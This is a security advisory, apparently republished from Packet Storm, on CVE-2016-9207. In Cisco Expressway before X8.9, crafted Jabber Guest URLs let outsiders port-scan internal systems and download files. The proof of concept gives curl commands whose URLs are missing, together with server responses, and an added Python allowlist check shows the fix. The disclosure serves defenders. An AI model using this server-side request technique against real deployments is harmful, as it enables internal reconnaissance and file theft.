Cisco Expressway 8.8.1 Internal Scanning

Type packetstorm
Reporter Micha Borrmann
Modified 2016-12-17T00:00:00


Advisory ID: SYSS-2016-115  
Product: Expressway  
Manufacturer: Cisco  
Affected Version(s): below X8.9  
Tested Version(s): X8.8.1  
Vulnerability Type: Improper Input Validation (CWE-20)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2016-11-10  
Solution Date: 2016-12-05  
Public Disclosure: 2016-12-14  
CVE Reference: CVE-2016-9207  
Author of Advisory: Micha Borrmann, SySS GmbH  
Jabber Guest [1] can be used to connect people from the Internet with  
enterprise workers using video calls within a web browser.  
Due to improper input validation, specially crafted URLs can be used to  
perform port scans, from the video communication server (VCS) [2], of any  
system that the VCS can reach, usually internal servers. It is also  
possible to perform denial-of-service attacks against the VCS by making  
it download large files.  
Vulnerability Details:  
Part of the URL is a host name (usually the internal Jabber Guest  
server) to which the EXP-C [3], acting as a web proxy, connects if  
/jabberc/rest/calls/ is appended to the first "directory".  
With a colon (:), a target TCP port can also be specified.  
Therefore, anybody, for example an external attacker, can abuse the web-based  
application to connect to target systems. If the target system is a web  
server, it is also possible to download files from it.  
Proof of Concept (PoC):  
This HTTP GET request connects to the SSH server on localhost:  
$ curl --include  
HTTP/1.1 200 Connection Established  
Server: nginx/1.6.2  
Date: Fri, 11 Nov 2016 12:14:20 GMT  
Transfer-Encoding: chunked  
Connection: keep-alive  
Age: 0  
SSH-2.0-OpenSSH_6.6 PKIX  
Protocol mismatch.  
It can be confirmed that no SMTP service is running on localhost (a very simple port scan):  
$ curl --include  
HTTP/1.1 502 Connection refused  
Server: nginx/1.6.2  
Date: Fri, 11 Nov 2016 12:22:30 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 253  
Connection: keep-alive  
Cache-Control: no-store  
Content-Language: en  
Age: 0  
<TITLE>Could Not Connect</TITLE>  
<BODY BGCOLOR="white" FGCOLOR="black">  
<H1>Could Not Connect</H1>  
<FONT FACE="Helvetica,Arial"><B>  
Description: Could not connect to the server "<EM></EM>".  
Connections to other servers are possible, too:  
$ curl --include  
HTTP/1.1 200 Connection Established  
Server: nginx/1.6.2  
Date: Fri, 11 Nov 2016 12:13:00 GMT  
Transfer-Encoding: chunked  
Connection: keep-alive  
Age: 0  
SSH-2.0-OpenSSH_6.2_hpn13v11 FreeBSD-20130515  
Protocol mismatch.  
If a web server contains files within the directory structure  
/jabberc/rest/calls/, they can be downloaded through Jabber Guest via  
EXP-E and EXP-C. For demonstration purposes, a simple text file was  
placed in such a directory (on a Microsoft server system, which can  
also be identified from the response headers):  
$ curl --include   
HTTP/1.1 200 OK  
Content-Type: text/plain  
Last-Modified: Thu, 27 Oct 2016 12:21:08 GMT  
Accept-Ranges: bytes  
ETag: "78c1c7984c30d21:0"  
Server: Microsoft-IIS/7.5  
X-Powered-By: ASP.NET  
Date: Thu, 10 Nov 2016 09:28:15 GMT  
Content-Length: 7  
Age: 0  
Connection: keep-alive  
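As an added illustration (not code from the advisory, SySS or Cisco) of the input validation CWE-20 calls for here: the host[:port] "directory" that precedes /jabberc/rest/calls/ is only accepted when it names a configured upstream, so the localhost:22, SMTP and foreign-server requests shown above are rejected before any connection is made. The upstream host name, the default port and the path layout are assumptions.

```python
"""Allowlist check for the host[:port] "directory" that precedes
/jabberc/rest/calls/ in a proxied request (added example, not Cisco code)."""
from urllib.parse import unquote
import ipaddress

# Constructed configuration (assumption): the only upstream the proxy may reach.
ALLOWED_UPSTREAMS = {("jabberguest.internal.example", 443)}
DEFAULT_PORT = 443  # assumed port used when the client gives no ":port"
MARKER = ["jabberc", "rest", "calls"]


def parse_target(path):
    """Return (host, port_text) parsed from the first path segment, or None
    if the request does not carry the /jabberc/rest/calls/ marker."""
    segments = unquote(path).split("/")  # decode first so %3A cannot hide a colon
    if len(segments) < 5 or segments[0] != "" or segments[2:5] != MARKER:
        return None
    hostport = segments[1]
    if hostport.startswith("["):  # bracketed IPv6 literal, e.g. [::1]:22
        host, _, tail = hostport[1:].partition("]")
        port = tail[1:] if tail.startswith(":") else tail
    else:
        host, _, port = hostport.partition(":")
    return host, port


def is_allowed_target(path, allowed=ALLOWED_UPSTREAMS):
    """True only when the request would reach a configured upstream."""
    target = parse_target(path)
    if target is None:
        return False
    host, port_text = target
    host = host.lower().rstrip(".")
    if not host:
        return False
    try:
        port = int(port_text) if port_text else DEFAULT_PORT
    except ValueError:
        return False
    if not 0 < port < 65536:
        return False
    # The configured upstream is a name; a raw IP literal (127.0.0.1, ::1,
    # RFC 1918 ranges) is exactly how internal scanning is expressed, so reject it.
    try:
        ipaddress.ip_address(host)
        return False
    except ValueError:
        pass
    return (host, port) in allowed
```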
Solution: Update to software version 8.9  
More Information:  
Disclosure Timeline:  
2016-10-27: Vulnerability discovered  
2016-11-10: Vulnerability reported to manufacturer  
2016-12-05: Patch released by manufacturer  
2016-12-07: Public disclosure of vulnerability by manufacturer [4]  
[1] Product website for Jabber Guest  
[2] Product website for Video Communication Server (VCS)  
[3] Product website for Expressway  
[4] Cisco Security Advisory: Cisco Expressway Series Software Security Bypass Vulnerability  
[5] SySS Security Advisory SYSS-2016-115  
[6] SySS Responsible Disclosure Policy  
This security vulnerability was found by Micha Borrmann of SySS GmbH.  
Public Key:  
Key ID: 0xEDBE26E714EA58760  
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
Creative Commons - Attribution (by) - Version 3.0